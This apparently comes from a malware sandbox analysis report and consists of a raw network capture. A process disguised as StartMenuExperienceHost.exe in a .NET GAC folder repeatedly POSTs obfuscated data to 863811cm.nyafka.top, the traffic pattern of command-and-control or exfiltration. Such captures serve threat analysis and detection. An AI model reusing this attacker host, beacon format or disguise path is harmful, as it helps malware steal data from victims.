                                                                Data Ascii: 98'^=9! X+X,!Z=]?'Z1$:.54X><0+Y?1*Q9>#(5?2>33&+-&0.="),0;#* *_9T=7">6=")&)*' ',27 "Z.U4./&"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                124192.168.2.550106188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:46.448084116 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:46.800029993 CEST2584OUTData Raw: 50 53 5d 58 51 58 58 51 5e 5a 55 58 51 50 5a 5c 57 5b 58 5d 55 52 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]XQXXQ^ZUXQPZ\W[X]URQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]+-<\<:T%.$E(4Y!+Y)0)R &>!T*(A52<Y>#Y$/\*5
                                                                Oct 11, 2024 01:37:46.904385090 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:47.293016911 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fn9vBJoHSfN5AvH%2BkStmrcqXbQ7X9kxur3BgqwQfkt5ou%2B5DhLGxKvB19pHjW%2B93y1gIlMqZdiZ0dOa7pXtRNJtdUT2IS2WuCaxnBXNQN%2BiqW%2FG76pKmm9GLLC8%2BhAMWK4Gygbi4"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70b3dd1142e9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:47.294143915 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fn9vBJoHSfN5AvH%2BkStmrcqXbQ7X9kxur3BgqwQfkt5ou%2B5DhLGxKvB19pHjW%2B93y1gIlMqZdiZ0dOa7pXtRNJtdUT2IS2WuCaxnBXNQN%2BiqW%2FG76pKmm9GLLC8%2BhAMWK4Gygbi4"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70b3dd1142e9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                125192.168.2.550107188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:47.415894032 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:47.769391060 CEST2584OUTData Raw: 50 5f 58 58 54 55 5d 55 5e 5a 55 58 51 54 5a 52 57 5c 58 5c 55 56 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_XXTU]U^ZUXQTZRW\X\UVQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?=?(%X0D+%45 )097B;0=%T>87"!>#Y$/\*%
                                                                Oct 11, 2024 01:37:47.890824080 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:48.063666105 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3%2Bzb08HOa%2F50ssn1cvnGMcmDB3pLaLfIJEW0HnVu1nhM5jxd%2BE%2B4XSmx1tMQkrLq7hiVv7vosGtQT1X2wo60Ry70uv49hf9cTmL86rbnRlw0yIXn6fNnwc6lhdvljV3msKPO3L6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70b9fd55431b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                126192.168.2.550108188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:48.273099899 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:48.629326105 CEST2584OUTData Raw: 55 5d 5d 5f 51 59 58 50 5e 5a 55 58 51 5d 5a 5b 57 5d 58 5f 55 53 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]_QYXP^ZUXQ]Z[W]X_USQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<4+'2> @+54!8?]+#5V#$#V'[9*<61*;#Y$/\*
                                                                Oct 11, 2024 01:37:48.735490084 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:48.993127108 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O8CtpoGWgfqC7Qk7VDovNYq%2FphGEjTPtc2sTE3hTemi44KakullwEPktc4yjkDt66kWjzziND%2FZ0xM0Xgu%2Fw9FkmgfDO8j5qrgUDPSWGhd0F5mk7scYaGSU97g6fGSXx7LpT3G3G"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70bf4c7a4382-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                127192.168.2.550109188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:49.074600935 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                128192.168.2.550110188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:49.116533995 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:49.472450972 CEST2584OUTData Raw: 50 52 5d 5d 54 5b 58 51 5e 5a 55 58 51 53 5a 5f 57 5d 58 58 55 53 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]]T[XQ^ZUXQSZ_W]XXUSQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_?=[>93&#(4Y#8?Z?3=W7$'-);+6W8[)+#Y$/\*9
                                                                Oct 11, 2024 01:37:49.784328938 CEST1236OUTData Raw: 50 52 5d 5d 54 5b 58 51 5e 5a 55 58 51 53 5a 5f 57 5d 58 58 55 53 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]]T[XQ^ZUXQSZ_W]XXUSQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_?=[>93&#(4Y#8?Z?3=W7$'-);+6W8[)+#Y$/\*9
                                                                Oct 11, 2024 01:37:50.367223024 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:50.367512941 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:50.367585897 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:50.369752884 CEST1348OUTData Raw: 38 1c 1e 14 3e 02 0c 31 03 00 3b 3b 3c 0b 33 30 2a 04 30 59 3f 13 24 59 03 27 01 1a 01 5d 0c 30 34 33 00 5f 3c 41 3f 1d 09 3c 1a 2a 30 00 06 3a 35 01 31 3f 34 3c 02 3b 00 22 20 1d 29 3e 13 05 30 1f 0e 5f 31 26 3c 27 2d 03 00 17 3e 38 01 3e 2a 2d
                                                                Data Ascii: 8>1;;<30*0Y?$Y']043_<A?<*0:51?4<;" )>0_1&<'->8>*-=-,#5$5 0'V(?!%?&3,Q3XZW?. 0:B4;/=Z,<=6\+P;6>'!,.5_,"(U>;/X\=?0+=-7/]%?>%7W&<;+1?1+>:\S1$[?"$9ZZ9<7+,/*0,2
                                                                Oct 11, 2024 01:37:50.742253065 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31jb39tbi%2Fb8V1QX6Ib%2Fq7udndfmrafxpqrcnQWsNscWG4ezzkcRv2s0zRt0xx2xK%2BZ2WUaxRovDHm1KK4W3jgsltKHMghNNulUqBXFK6GCsQRS60Nx460%2FyQlw%2FrNXfdhxvLpnl"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70c489e87d0c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                129192.168.2.550111188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:49.231300116 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:49.581716061 CEST2004OUTData Raw: 50 5c 58 5d 51 5e 58 50 5e 5a 55 58 51 5c 5a 5a 57 5d 58 5f 55 54 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\X]Q^XP^ZUXQ\ZZW]X_UTQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]+=?)82.8B( 6;+0!#+R'=S*"(_>;#Y$/\*
                                                                Oct 11, 2024 01:37:49.893738031 CEST1236OUTData Raw: 50 5c 58 5d 51 5e 58 50 5e 5a 55 58 51 5c 5a 5a 57 5d 58 5f 55 54 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\X]Q^XP^ZUXQ\ZZW]X_UTQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]+=?)82.8B( 6;+0!#+R'=S*"(_>;#Y$/\*
                                                                Oct 11, 2024 01:37:50.367257118 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:50.367568970 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:50.367810965 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:50.370923042 CEST768OUTData Raw: 3f 24 38 2d 08 04 1c 55 34 3b 01 41 0e 33 30 13 05 20 3c 0e 34 13 06 16 3f 41 01 29 06 2a 51 2c 37 0c 3d 06 0a 1d 20 19 31 5b 57 2d 06 3c 28 35 33 00 13 2d 3f 2c 0d 1f 31 30 3f 21 07 2e 39 28 35 3d 2c 20 0a 0a 20 1d 37 2d 22 2d 3b 04 09 1d 03 5a
                                                                Data Ascii: ?$8-U4;A30 <4?A)*Q,7= 1[W-<(53-?,10?!.9(5=, 7-"-;Z>=55)(,!06?&6.'Z^5-Z<0((#*)1,9 '<#*?8&X;;)+")>??<;T\-,,:5<[1^;<,5& '&#2>?7'+&(5_*4,32+)+X<<%1Z_<X
                                                                Oct 11, 2024 01:37:50.622759104 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QDz65F5fRmfS2Y8O5lF%2BVuONUDD%2BDuldrLITsDhj2C6qi7LctzJrGZH7OO%2FcoRvQgI29n%2BEzI711Ftuw9t5I7NNXm69bbauxj6GoCjXEMCs3UOwiCC28ffpLNDOcMfBurD8dsL7o"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70c539eb19e3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 2a 2a 3e 57 37 2e 2f 1f 3b 31 02 13 2b 3d 3a 15 3c 08 27 5b 25 0a 3c 07 2d 05 36 0d 36 38 30 5e 2a 3c 31 07 27 2c 2f 12 3c 0b 2a 51 03 1b 39 11 3c 33 27 1d 28 54 35 5c 2b 22 3a 04 27 23 35 40 29 03 25 51 27 2d 2d 05 22 22 3c 11 29 3f 30 0f 38 05 0d 43 28 28 22 11 34 2b 2a 5f 08 13 3a 0f 29 06 24 1d 21 24 39 15 35 04 28 0b 22 07 0f 0f 3d 07 3a 1e 27 0d 3f 01 2c 21 28 59 20 2c 37 56 21 3c 0c 1f 23 3e 34 5b 31 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'**>W7./;1+=:<'[%<-6680^*<1',/<*Q9<3'(T5\+":'#5@)%Q'--""<)?08C(("4+*_:)$!$95("=:'?,!(Y ,7V!<#>4[1"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                130192.168.2.550112188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:50.748368025 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:51.099569082 CEST2004OUTData Raw: 50 5f 58 58 54 55 58 55 5e 5a 55 58 51 52 5a 5c 57 5c 58 5d 55 52 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_XXTUXU^ZUXQRZ\W\X]URQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?0X<:'W2>+(!0<06 ''W3=!R*(6W/);#Y$/\*
                                                                Oct 11, 2024 01:37:51.221674919 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:51.390083075 CEST752INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nU%2BQCevM9SBhv%2Fh8Hlz77nnTm7IGpAlc1zi2v0B%2FUA7YHIQG3O5%2F88u3f5cq6AwPLrgneJdrjeFIyDB%2BG5sgBRSUkRTrlRVRMQ9oe%2BnHESNoXQTGHp1Cm7eMoi8huyhiNXwy%2FQre"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70ced9084268-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 28 39 29 0a 34 58 34 00 38 21 0e 5a 29 5b 32 14 2b 31 37 5f 25 0a 28 07 2c 2c 22 0d 35 3b 3f 04 2a 12 2a 5b 26 3c 37 5b 28 0b 2a 51 03 1b 39 59 3f 33 3b 56 28 54 29 5f 29 32 0c 06 24 23 31 45 2b 3e 31 55 24 00 3a 5e 21 21 38 1c 3d 05 2f 1d 2c 02 23 08 2a 38 07 02 20 11 2a 5f 08 13 39 50 2a 16 28 13 36 37 3d 14 36 04 28 0a 22 00 2a 1b 3e 5f 25 0f 33 0a 30 5d 2c 32 38 5f 34 3c 2c 08 35 3c 22 1e 21 2d 20 5a 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$(9)4X48!Z)[2+17_%(,,"5;?**[&<7[(*Q9Y?3;V(T)_)2$#1E+>1U$:^!!8=/,#*8 *_9P*(67=6("*>_%30],28_4<,5<"!- Z%("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                131192.168.2.550113188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:50.893213034 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:51.249819040 CEST2584OUTData Raw: 50 5d 5d 5b 51 5f 58 51 5e 5a 55 58 51 50 5a 52 57 5f 58 5c 55 50 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]][Q_XQ^ZUXQPZRW_X\UPQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:).3+);V1 ?%"]#[< 5T +S3.9U*^<"2 Z*#Y$/\*5
                                                                Oct 11, 2024 01:37:51.341695070 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:51.520266056 CEST607INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4NzxKwnsiSA8pqTF%2BU96PsQamFrD3r4eFKCORvARHYEDXz%2BHz9B1m0PHlCaNdHiCmTvrvjEzqi%2FFQrgS1%2FZbSRW374V%2Fmg7%2FgwBlJfeW48xhkDjnkZRvUOhIEsbdgM%2B%2F6pi%2BZXbs"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70cf9fb54313-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                132192.168.2.550114188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:51.511104107 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:51.862598896 CEST2004OUTData Raw: 55 5d 5d 5f 54 5e 58 5e 5e 5a 55 58 51 5c 5a 5b 57 5d 58 59 55 51 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]_T^X^^ZUXQ\Z[W]XYUQQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<X<*/U'- B(5,]588(5!$S'-%>8,F5"$(;#Y$/\*
                                                                Oct 11, 2024 01:37:51.976552963 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:52.432797909 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Im8xzRP5FsngK9LioPunXdpNmYnGPeVvJRKxcI0p%2BfsiceDhhQWY3zT1EqDqJjKJML8V1RIf2OIwe8Xh0V7CqIyKqtw7F6lsjhk%2BzvmYaobnp39WgvV0lhN4eyip84mTwDOpPCJ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70d38a800fa9-EWR
                                                                alt-svc: h3=":443"; ma=86400
